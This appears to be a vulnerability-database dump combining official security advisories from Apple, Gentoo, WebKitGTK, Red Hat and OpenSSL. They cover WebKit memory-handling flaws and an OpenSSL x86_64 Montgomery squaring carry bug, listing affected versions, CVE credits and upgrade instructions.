CVE-2009-2417, CVE-2010-0734, CVE-2011-2192 Package Information: https://launchpad.net/ubuntu/+source/curl/7.21.3-1ubuntu1.2 https://launchpad.net/ubuntu/+source/curl/7.21.0-1ubuntu1.1 https://launchpad.net/ubuntu/+source/curl/7.19.7-1ubuntu1.1 https://launchpad.net/ubuntu/+source/curl/7.18.0-1ubuntu2.3
var-201904-1475 A memory consumption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, tvOS 12, watchOS 5, Safari 12, iTunes 12.9 for Windows, iCloud for Windows 7.7. plural Apple The product has a memory consumption vulnerability due to flaws in memory handling.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Service operation interruption (DoS) * Arbitrary code execution * Script execution * information leak * Access restriction avoidance. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A resource management error vulnerability exists in the WebKit component of several Apple products. An attacker could exploit this vulnerability to cause an assertion failure (memory consumption). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: December 02, 2018 Bugs: #667892 ID: 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.22.0 >= 2.22.0 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.22.0" References ========== [ 1 ] CVE-2018-4191 https://nvd.nist.gov/vuln/detail/CVE-2018-4191 [ 2 ] CVE-2018-4197 https://nvd.nist.gov/vuln/detail/CVE-2018-4197 [ 3 ] CVE-2018-4207 https://nvd.nist.gov/vuln/detail/CVE-2018-4207 [ 4 ] CVE-2018-4208 https://nvd.nist.gov/vuln/detail/CVE-2018-4208 [ 5 ] CVE-2018-4209 https://nvd.nist.gov/vuln/detail/CVE-2018-4209 [ 6 ] CVE-2018-4210 https://nvd.nist.gov/vuln/detail/CVE-2018-4210 [ 7 ] CVE-2018-4212 https://nvd.nist.gov/vuln/detail/CVE-2018-4212 [ 8 ] CVE-2018-4213 https://nvd.nist.gov/vuln/detail/CVE-2018-4213 [ 9 ] CVE-2018-4299 https://nvd.nist.gov/vuln/detail/CVE-2018-4299 [ 10 ] CVE-2018-4306 https://nvd.nist.gov/vuln/detail/CVE-2018-4306 [ 11 ] CVE-2018-4309 https://nvd.nist.gov/vuln/detail/CVE-2018-4309 [ 12 ] CVE-2018-4311 https://nvd.nist.gov/vuln/detail/CVE-2018-4311 [ 13 ] CVE-2018-4312 https://nvd.nist.gov/vuln/detail/CVE-2018-4312 [ 14 ] CVE-2018-4314 https://nvd.nist.gov/vuln/detail/CVE-2018-4314 [ 15 ] CVE-2018-4315 https://nvd.nist.gov/vuln/detail/CVE-2018-4315 [ 16 ] CVE-2018-4316 https://nvd.nist.gov/vuln/detail/CVE-2018-4316 [ 17 ] CVE-2018-4317 https://nvd.nist.gov/vuln/detail/CVE-2018-4317 [ 18 ] CVE-2018-4318 https://nvd.nist.gov/vuln/detail/CVE-2018-4318 [ 19 ] CVE-2018-4319 https://nvd.nist.gov/vuln/detail/CVE-2018-4319 [ 20 ] CVE-2018-4323 https://nvd.nist.gov/vuln/detail/CVE-2018-4323 [ 21 ] CVE-2018-4328 https://nvd.nist.gov/vuln/detail/CVE-2018-4328 [ 22 ] CVE-2018-4358 https://nvd.nist.gov/vuln/detail/CVE-2018-4358 [ 23 ] CVE-2018-4359 https://nvd.nist.gov/vuln/detail/CVE-2018-4359 [ 24 ] CVE-2018-4361 https://nvd.nist.gov/vuln/detail/CVE-2018-4361 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201812-04 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. WebKit We would like to acknowledge Cary Hartline, Hanming Zhang from 360 Vuclan team, and Zach Malone of CA Technologies for their assistance. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-10-30-10 Additional information for APPLE-SA-2018-9-24-5 watchOS 5 watchOS 5 addresses the following: CFNetwork Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 CoreFoundation Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4412: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreFoundation Available for: Apple Watch Series 1 and later Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4414: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreText Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4347: an anonymous researcher Entry added October 30, 2018 Grand Central Dispatch Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4426: Brandon Azad Entry added October 30, 2018 Heimdal Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4331: Brandon Azad CVE-2018-4332: Brandon Azad CVE-2018-4343: Brandon Azad Entry added October 30, 2018 IOHIDFamily Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation CVE-2018-4408: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to break out of its sandbox Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4341: Ian Beer of Google Project Zero CVE-2018-4354: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2018-4383: Apple Entry added October 30, 2018 IOUserEthernet Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4401: Apple Entry added October 30, 2018 iTunes Store Available for: Apple Watch Series 1 and later Impact: An attacker in a privileged network position may be able to spoof password prompts in the iTunes Store Description: An input validation issue was addressed with improved input validation. CVE-2018-4305: Jerry Decime Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to leak sensitive user information Description: An access issue existed with privileged API calls. CVE-2018-4399: Fabiano Anemone (@anoane) Entry added October 30, 2018 Kernel Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4336: Brandon Azad CVE-2018-4337: Ian Beer of Google Project Zero CVE-2018-4340: Mohamed Ghannam (@_simo36) CVE-2018-4344: The UK's National Cyber Security Centre (NCSC) CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 Kernel Available for: Apple Watch Series 1 and later Impact: An application may be able to read restricted memory Description: An input validation issue existed in the kernel. CVE-2018-4363: Ian Beer of Google Project Zero Kernel Available for: Apple Watch Series 1 and later Impact: An attacker in a privileged network position may be able to execute arbitrary code Description: A memory corruption issue was addressed with improved validation. CVE-2018-4407: Kevin Backhouse of Semmle Ltd. Entry added October 30, 2018 Safari Available for: Apple Watch Series 1 and later Impact: A local user may be able to discover websites a user has visited Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Security Available for: Apple Watch Series 1 and later Impact: A local user may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2018-4395: Patrick Wardle of Digita Security Entry added October 30, 2018 Security Available for: Apple Watch Series 1 and later Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm Description: This issue was addressed by removing RC4. CVE-2016-1777: Pepi Zawodsky Symptom Framework Available for: Apple Watch Series 1 and later Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 Text Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted text file may lead to a denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-4304: jianan.huang (@Sevck) Entry added October 30, 2018 WebKit Available for: Apple Watch Series 1 and later Impact: Unexpected interaction causes an ASSERT failure Description: A memory corruption issue was addressed with improved validation. CVE-2018-4319: John Pettitt of Google WebKit Available for: Apple Watch Series 1 and later Impact: Unexpected interaction causes an ASSERT failure Description: A memory consumption issue was addressed with improved memory handling. CVE-2018-4361: found by OSS-Fuzz Additional recognition Core Data We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Kernel We would like to acknowledge Brandon Azad for their assistance. SQLite We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgUpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3GbihAA rJrGRlOECVnj/z6kzobQ6SjqeXQanrEJKOEbP12pOEgOcqhJd/CsRIGMGxtG8cRC H60/qGsVtDXhqmGZQl2cBaMeg+bagLvSaRUC6urXqYLIKoGay7zsbQyWS4hAbyNu Gpu0k5bvb2tr3IZIfqHfUcScxpsB3zJiYejtgLow2MDbkt84qNqx73xYbOIXDJoc kfyNhb/RKqiXOi5Yvh+E84GARjUSGUFD5fMbIMu7Lf0cwGpL3XakKG8S+8L0W3/W vGsl7V8DWeH6qbVoMkLUxWGxWzCd4bUr88J0cybski3L4SvpYbDPMMKxQkyn4Rfq qSDG3RMS0MUeoGn/iwRcJ8p6gPMGjWTT+lvX0XaZzG3b/mkOw8C2jRs1Ds8vUbRB Pxn1AQvg0x+EW/HIKqrvbE6i5pLjhurHYChy9tI9AS2iSHsAnrSB8DV8mc4T4v6a zJqJO5qPPCVJ9K328l+FyXe+X5erQP4/dwol71VjweA/peSJCL34/YL3oSs9e41R ApabYVIphnq0Ion5gVNancPhgQEbkIjMncFiGRg4wF0jly2Ni+NsnDquTKEM3VvG mOlo0VVw3XxLhtiQF/RKbQSy+6dK0YGykIsmnz/DsstxS4xRiWbk75XErA/nSwPs fHAicxI2AmpI+PbdYcPI4D3eJr/1ZDH8NvY1897WX5c= =fz+z -----END PGP SIGNATURE----- . CVE-2018-4329: Hugo S. Installation note: Safari 12 may be obtained from the Mac App Store. ----------------------------------------------------------------------- WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007 ------------------------------------------------------------------------ Date reported : September 26, 2018 Advisory ID : WSA-2018-0007 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html CVE identifiers : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4311, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4207 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4208 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4209 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4210 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction with indexing types caused a failure. An array indexing issue existed in the handling of a function in JavaScriptCore. CVE-2018-4212 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4213 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4191 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4197 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4299 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4306 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4309 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative. A malicious website may be able to execute scripts in the context of another website. A cross-site scripting issue existed in WebKit. CVE-2018-4311 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Erling Alf Ellingsen (@steike). Cross-origin SecurityErrors includes the accessed frameas origin. The issue was addressed by removing origin information. CVE-2018-4312 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4314 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4315 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4316 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4317 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4318 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4319 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to John Pettitt of Google. A malicious website may cause unexepected cross-origin behavior. A cross-origin issue existed with iframe elements. CVE-2018-4323 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4328 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4358 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4359 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroA (@5aelo). Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4361 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, September 26, 2018
var-201711-0923 There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen. OpenSSL is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. Versions prior to OpenSSL 1.1.0g and 1.0.2m are vulnerable. Description: This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering. This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release. This release upgrades OpenSSL to version 1.0.2.n Security Fix(es): * openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() (CVE-2016-2182) * openssl: Insufficient TLS session ticket HMAC length checks (CVE-2016-6302) * openssl: certificate message OOB reads (CVE-2016-6306) * openssl: Carry propagating bug in Montgomery multiplication (CVE-2016-7055) * openssl: Truncated packet could crash via OOB read (CVE-2017-3731) * openssl: BN_mod_exp may produce incorrect results on x86_64 (CVE-2017-3732) * openssl: bn_sqrx8x_internal carry bug on x86_64 (CVE-2017-3736) * openssl: Read/write after SSL object in error state (CVE-2017-3737) * openssl: rsaz_1024_mul_avx2 overflow bug on x86_64 (CVE-2017-3738) Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6306 and CVE-2016-7055. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/): 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1393929 - CVE-2016-7055 openssl: Carry propagating bug in Montgomery multiplication 1416852 - CVE-2017-3731 openssl: Truncated packet could crash via OOB read 1416856 - CVE-2017-3732 openssl: BN_mod_exp may produce incorrect results on x86_64 1509169 - CVE-2017-3736 openssl: bn_sqrx8x_internal carry bug on x86_64 1523504 - CVE-2017-3737 openssl: Read/write after SSL object in error state 1523510 - CVE-2017-3738 openssl: rsaz_1024_mul_avx2 overflow bug on x86_64 6. JIRA issues fixed (https://issues.jboss.org/): JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7 7. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201712-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 14, 2017 Bugs: #629290, #636264, #640172 ID: 201712-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in OpenSSL, the worst of which may lead to a Denial of Service condition. Background ========== OpenSSL is a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/openssl < 1.0.2n >= 1.0.2n Description =========== Multiple vulnerabilities have been discovered in OpenSSL. Please review the referenced CVE identifiers for details. Impact ====== A remote attacker could cause a Denial of Service condition, recover a private key in unlikely circumstances, circumvent security restrictions to perform unauthorized actions, or gain access to sensitive information. Workaround ========== There are no known workarounds at this time. Resolution ========== All OpenSSL users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2n" References ========== [ 1 ] CVE-2017-3735 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3735 [ 2 ] CVE-2017-3736 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3736 [ 3 ] CVE-2017-3737 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3737 [ 4 ] CVE-2017-3738 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3738 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201712-03 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 --IrEhWFjxIJsFtqH1v1HHQsLm3nLmhNeP4-- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: java-1.8.0-ibm security update Advisory ID: RHSA-2018:2575-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://access.redhat.com/errata/RHSA-2018:2575 Issue date: 2018-08-28 CVE Names: CVE-2016-0705 CVE-2017-3732 CVE-2017-3736 CVE-2018-1517 CVE-2018-1656 CVE-2018-2940 CVE-2018-2952 CVE-2018-2973 CVE-2018-12539 ==================================================================== 1. Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 6 Supplementary. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR5-FP20. Security Fix(es): * IBM JDK: privilege escalation via insufficiently restricted access to Attach API (CVE-2018-12539) * openssl: BN_mod_exp may produce incorrect results on x86_64 (CVE-2017-3732) * openssl: bn_sqrx8x_internal carry bug on x86_64 (CVE-2017-3736) * IBM JDK: DoS in the java.math component (CVE-2018-1517) * IBM JDK: path traversal flaw in the Diagnostic Tooling Framework (CVE-2018-1656) * Oracle JDK: unspecified vulnerability fixed in 6u201, 7u191, 8u181, and 10.0.2 (Libraries) (CVE-2018-2940) * OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547) (CVE-2018-2952) * Oracle JDK: unspecified vulnerability fixed in 6u201, 7u191, 8u181, and 10.0.2 (JSSE) (CVE-2018-2973) * OpenSSL: Double-free in DSA code (CVE-2016-0705) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank the OpenSSL project for reporting CVE-2016-0705. Upstream acknowledges Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 All running instances of IBM Java must be restarted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code 1416856 - CVE-2017-3732 openssl: BN_mod_exp may produce incorrect results on x86_64 1509169 - CVE-2017-3736 openssl: bn_sqrx8x_internal carry bug on x86_64 1600925 - CVE-2018-2952 OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547) 1602145 - CVE-2018-2973 Oracle JDK: unspecified vulnerability fixed in 6u201, 7u191, 8u181, and 10.0.2 (JSSE) 1602146 - CVE-2018-2940 Oracle JDK: unspecified vulnerability fixed in 6u201, 7u191, 8u181, and 10.0.2 (Libraries) 1618767 - CVE-2018-12539 IBM JDK: privilege escalation via insufficiently restricted access to Attach API 1618869 - CVE-2018-1656 IBM JDK: path traversal flaw in the Diagnostic Tooling Framework 1618871 - CVE-2018-1517 IBM JDK: DoS in the java.math component 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.i686.rpm x86_64: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.8.0-ibm-1.8.0.5.20-1jpp.1.el6_10.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.i686.rpm ppc64: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.ppc64.rpm s390x: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.s390x.rpm x86_64: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.i686.rpm x86_64: java-1.8.0-ibm-jdbc-1.8.0.5.20-1jpp.1.el6_10.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-0705 https://access.redhat.com/security/cve/CVE-2017-3732 https://access.redhat.com/security/cve/CVE-2017-3736 https://access.redhat.com/security/cve/CVE-2018-1517 https://access.redhat.com/security/cve/CVE-2018-1656 https://access.redhat.com/security/cve/CVE-2018-2940 https://access.redhat.com/security/cve/CVE-2018-2952 https://access.redhat.com/security/cve/CVE-2018-2973 https://access.redhat.com/security/cve/CVE-2018-12539 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBW4WgLdzjgjWX9erEAQixyw//d2pemlb2TNR2kW3WlrxY0KBjUBM+PS4i bQ8+SoNsct2XtVFq0oOfwAmYMn++pAY37yvvhUdefe5sAcUldDcJtLIgXbtISSXe V5EdrLvQbv/rSxikOfccFzNI8GwJTgGiLpq8n9exHcSsY5cZevzukgRr6b+yQbnj mcYEC3TB/CnulDac/Pt0VsS9AoFhwuX958/+EQdpMq1yOGqog6eM8U6x2btA4YSi mcVD2hom6GuYMKq0oWDPWPry5hJePvbPM6GZw8pYdRvA1eKjp24M3mkWkkIEFw6U aZCW6YXJuwMMJ4IYbF1Aofm3ab+R1VZXmPvzMHXRhVcRyZLvBzo1fZaw7ISX1ibV FimDRrXLIJDudoS80DMVmbgQTL37U6pGAe6gV2JLtvtEZl02Sxq5PeRfuMME4qeP rT+xyz0zjyIqTpxhAzAQJ28ZCrWDvRycCT5ZLwaPfxZ0+4cY1l58TMfYpdwIKJSC M8HQccrNxQ8S/kSKexIT18mSQcMwOhDza6gV4hSiOQgI/xHW3sic78a7/74JnSBT DgZuicAq73IWdYu67B04UzsZNsySSW6vs3BeYdfN5BnmK40NxrH5d5LMRV4xKmN+ HlkzX1CrDCBl9PtbQF0xpUGluvXCg1u2kzGHj4Dv7JP64bV1wXmLm5kwrPL/QZhv 8IL8kIZinC8=eoiE -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . OpenSSL Security Advisory [07 Dec 2017] ======================================== Read/write after SSL object in error state 